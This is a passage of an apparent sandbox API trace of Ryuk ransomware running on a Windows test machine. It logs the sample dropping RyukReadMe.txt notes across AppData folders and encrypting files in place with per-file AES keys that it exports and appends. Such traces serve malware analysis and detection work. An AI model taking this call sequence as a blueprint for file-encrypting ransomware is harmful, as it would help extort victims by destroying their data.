(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.706] GetLastError () returned 0x0 [0147.706] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0147.707] CloseHandle (hObject=0x198) returned 1 [0147.707] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0147.708] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0147.708] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0147.708] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.708] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml", dwFileAttributes=0x80) returned 1 [0147.709] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0147.709] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=13) returned 1 [0147.709] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=13) returned 1 [0147.709] CloseHandle (hObject=0x19c) returned 1 [0147.709] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.709] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0147.709] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0147.709] SetLastError (dwErrCode=0x0) [0147.709] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.709] GetLastError () returned 0x0 [0147.709] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0147.710] CloseHandle (hObject=0x198) returned 1 [0147.710] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.710] SetLastError (dwErrCode=0x0) [0147.710] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.710] GetLastError () returned 0xb7 [0147.710] CloseHandle (hObject=0x198) returned 1 [0147.711] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0147.711] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0147.711] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0147.711] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.712] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml", dwFileAttributes=0x80) returned 1 [0147.712] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0147.712] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=13) returned 1 [0147.712] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=13) returned 1 [0147.713] CloseHandle (hObject=0x19c) returned 1 [0147.713] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.713] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0147.713] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0147.713] SetLastError (dwErrCode=0x0) [0147.713] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.714] GetLastError () returned 0x0 [0147.714] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0147.714] CloseHandle (hObject=0x198) returned 1 [0147.715] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.715] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.715] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat", dwFileAttributes=0x80) returned 1 [0147.715] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.715] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=32768) returned 1 [0147.715] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=32768) returned 1 [0147.715] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x7ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.715] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0147.716] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.716] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0147.716] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.717] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.717] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x8000, lpOverlapped=0x0) returned 1 [0147.717] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0147.718] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x8000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x8010) returned 1 [0147.718] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.718] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x8010, lpOverlapped=0x0) returned 1 [0147.718] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0147.718] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.718] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0147.718] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0147.718] CloseHandle (hObject=0x198) returned 1 [0147.734] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.738] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.738] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.739] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.739] SetLastError (dwErrCode=0x0) [0147.739] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.739] GetLastError () returned 0xb7 [0147.739] CloseHandle (hObject=0x198) returned 1 [0147.739] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0147.739] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0147.739] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0147.739] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0147.739] SetLastError (dwErrCode=0x0) [0147.739] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\uv0duwvb\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.740] GetLastError () returned 0x0 [0147.740] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0147.740] CloseHandle (hObject=0x198) returned 1 [0147.741] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.741] SetLastError (dwErrCode=0x0) [0147.741] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.741] GetLastError () returned 0xb7 [0147.741] CloseHandle (hObject=0x198) returned 1 [0147.741] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0147.741] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0147.741] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0147.741] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0147.741] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml", dwFileAttributes=0x80) returned 1 [0147.748] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0147.748] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=836) returned 1 [0147.748] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=836) returned 1 [0147.748] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x222, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.748] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0147.749] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.749] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0147.749] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0147.749] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.749] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x344, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x344, lpOverlapped=0x0) returned 1 [0147.750] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0147.750] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x344, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x350) returned 1 [0147.750] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.750] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x350, lpOverlapped=0x0) returned 1 [0147.750] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0147.750] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0147.750] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0147.750] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0147.750] CloseHandle (hObject=0x19c) returned 1 [0147.766] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.770] CryptDestroyKey (hKey=0x3b8690) returned 1 [0147.770] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0147.771] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0147.771] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0147.771] SetLastError (dwErrCode=0x0) [0147.771] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0147.771] GetLastError () returned 0x0 [0147.771] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0147.772] CloseHandle (hObject=0x198) returned 1 [0147.772] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0147.772] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0147.772] SetLastError (dwErrCode=0x0) [0147.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0147.772] GetLastError () returned 0xb7 [0147.772] CloseHandle (hObject=0x194) returned 1 [0147.773] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0147.773] SetLastError (dwErrCode=0x0) [0147.773] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0147.773] GetLastError () returned 0xb7 [0147.773] CloseHandle (hObject=0x194) returned 1 [0147.773] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0147.773] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0147.773] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0147.773] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0147.773] SetLastError (dwErrCode=0x0) [0147.773] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0147.773] GetLastError () returned 0x0 [0147.773] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0147.774] CloseHandle (hObject=0x194) returned 1 [0147.774] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0147.774] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0147.775] SetLastError (dwErrCode=0x0) [0147.775] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0147.775] GetLastError () returned 0xb7 [0147.775] CloseHandle (hObject=0x190) returned 1 [0147.775] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0147.775] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0147.775] SetLastError (dwErrCode=0x0) [0147.775] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0147.775] GetLastError () returned 0xb7 [0147.775] CloseHandle (hObject=0x18c) returned 1 [0147.775] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0147.775] SetLastError (dwErrCode=0x0) [0147.775] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0147.775] GetLastError () returned 0xb7 [0147.775] CloseHandle (hObject=0x18c) returned 1 [0147.775] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0147.776] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0147.776] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0147.776] SetLastError (dwErrCode=0x0) [0147.776] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0147.777] GetLastError () returned 0x0 [0147.777] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, 